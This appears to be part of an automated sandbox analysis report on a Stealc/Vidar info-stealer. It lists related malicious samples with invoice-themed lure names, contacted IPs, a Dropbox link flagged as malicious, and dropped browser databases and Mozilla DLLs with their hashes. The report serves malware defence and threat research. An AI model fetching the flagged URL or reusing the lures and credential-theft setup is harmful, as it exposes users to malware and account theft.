	https://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0	Get hash	malicious	Unknown	Browse	20.109.210.53 13.107.246.63 20.190.147.1 23.218.208.109
	0a0#U00a0.js	Get hash	malicious	RHADAMANTHYS	Browse	20.109.210.53 13.107.246.63 20.190.147.1 23.218.208.109
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99 49.13.32.95
	412300061474#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.99 49.13.32.95
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.99 49.13.32.95
	Cargo Invoice_pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.99 49.13.32.95
	KAHILINGAN NG BADYET 25-11-2024#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.99 49.13.32.95
	URGENT!! DHL invoice SG00101637 Adobe#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.99 49.13.32.95
	rorderrequirementsCIF-TRC809910645210.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.99 49.13.32.95
	S50MC-C_3170262-7.6cylinder_liner.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.99 49.13.32.95
	Outstanding Invoices_pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.99 49.13.32.95
	lw2HMxuVuf.exe	Get hash	malicious	Unknown	Browse	149.154.167.99 49.13.32.95

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BAAFBFBAAKEC\AAKKKEBFC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAAFBFBAAKEC\DHJKJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAAFBFBAAKEC\EBAFHC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAAFBFBAAKEC\EHIDAK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAAFBFBAAKEC\FIIEHJDBK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAAFBFBAAKEC\GIJECG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2653280550435502
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkM3SAELyKOMq+8yC8F/YfU5m+OlTLVum8H:Bq+n0J39ELyKOMq+8y9/Ow/
MD5:	D209E03919804F832E6557A18F5CB531
SHA1:	A8924D119F036FF0E28758CC5F2D0E4CBF643182
SHA-256:	E5D6EEEFDDF7BA9000ED45A5BCB35A0A6EC9F301684EBC463BFA85BE4780248C
SHA-512:	437E86961376078D014B95B2A13CC8F0AD05BAB3D5ADE19DB3A4A29EF0F11C6B06771D12BD3A9C2BEA71C3416B98BF12FC895EFECAD64931E4EEE62592B3C251
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAAFBFBAAKEC\HCBGDG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAAFBFBAAKEC\HCBGDG-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAAFBFBAAKEC\HDAKFC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAAFBFBAAKEC\HDAKFC-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAAFBFBAAKEC\JJECAA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	65277
Entropy (8bit):	6.607056426486409
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86f:lw28V55At/zqw+Iq9ecbA2W8K
MD5:	F0FB0D50625E13969EB8407BF0831EE1
SHA1:	A2A79D842CF30067B7CB4FDC25F850B9E51154B0
SHA-256:	16BBE489E724A7CD593C92572F4ADDB04BA8C80179F005CBEFF766613AA4F091
SHA-512:	329B68B4D7A714D9FF29FD8E41913036DFC8EFD8F6E3D28B5A209084EEE7CAAD51E4DD08CFC4A3FCBCA27E6B435D223605350B384664A4C14E0DA7CF69BC9E08
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\143e866c-d711-46df-8d08-83f6ff57e66f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44608
Entropy (8bit):	6.096719610280921
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBJwushDO6vP6OW8FJP9vOZF6GIcGoup1Xl3jVzXr2:z/Ps+wsI7ynEf6Vchu3VlXr4CRo1
MD5:	175703F8EE489174EED91BB8EA1A5CC8
SHA1:	4E37C93931ACD98F5394A041516D1356469D40E4
SHA-256:	4A24FBDF8056FBE6E351B0EE2D1C9E4D0498DC1FB1FAA812B14488B58B34DA3A
SHA-512:	DC910F2B480F613BAB6010CDC0B828E87D563356F011E5A66673E4A4AF43E93FDC70B3559F46E98E648ACDE278A035994F4F19AD3F23CD35884993C723D9155D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\44c7abec-5e61-4c54-88c9-ba6950150ec6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44608
Entropy (8bit):	6.096719610280921
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBJwushDO6vP6OW8FJP9vOZF6GIcGoup1Xl3jVzXr2:z/Ps+wsI7ynEf6Vchu3VlXr4CRo1
MD5:	175703F8EE489174EED91BB8EA1A5CC8
SHA1:	4E37C93931ACD98F5394A041516D1356469D40E4
SHA-256:	4A24FBDF8056FBE6E351B0EE2D1C9E4D0498DC1FB1FAA812B14488B58B34DA3A
SHA-512:	DC910F2B480F613BAB6010CDC0B828E87D563356F011E5A66673E4A4AF43E93FDC70B3559F46E98E648ACDE278A035994F4F19AD3F23CD35884993C723D9155D
Malicious:	false
